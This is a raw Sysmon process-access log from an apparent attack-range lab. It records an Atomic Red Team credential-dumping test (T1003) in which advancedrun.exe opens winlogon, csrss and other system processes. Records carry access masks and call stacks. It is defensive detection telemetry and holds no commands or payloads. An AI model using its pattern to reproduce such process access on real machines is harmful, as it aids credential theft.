17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953200Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953199Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953198Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953197Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953196Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003953195Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953194Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953193Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953192Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953191Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953190Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953189Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953188Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953187Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953186Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953185Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953184Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 